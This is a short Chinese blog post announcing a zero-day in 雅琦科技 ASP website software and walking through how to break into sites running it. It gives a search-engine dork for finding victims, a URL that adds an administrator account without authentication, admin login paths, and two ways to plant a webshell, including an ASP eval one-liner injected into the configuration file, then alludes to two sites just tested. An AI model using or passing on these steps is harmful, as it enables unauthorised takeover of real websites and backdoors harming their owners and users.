小杰博客

在网上发现又出现一个新的漏洞 雅琦科技程序0day

关键字：inurl:ShowInfo.asp?ShowId=

找到网站后然后在网站地址后加上：admin/User_Manage.asp?action=UserAdd

进去添加一个管理员，然后用添加的账户登录。
/admin/Yqlogin.asp
/admin/admin_main.asp（一般是这个）

后台拿Webshell网上有2个方法，不过我对这个不大在行。呵呵。。。还不会，方法如下：

1.在上传目录那里 添加1.asp，利用IIS的解析漏洞。

2.在上传目录那里 写上
“%><%eval request(“a”)%><%’
然后访问配置文件 inc/config.asp

下面是刚检测的俩站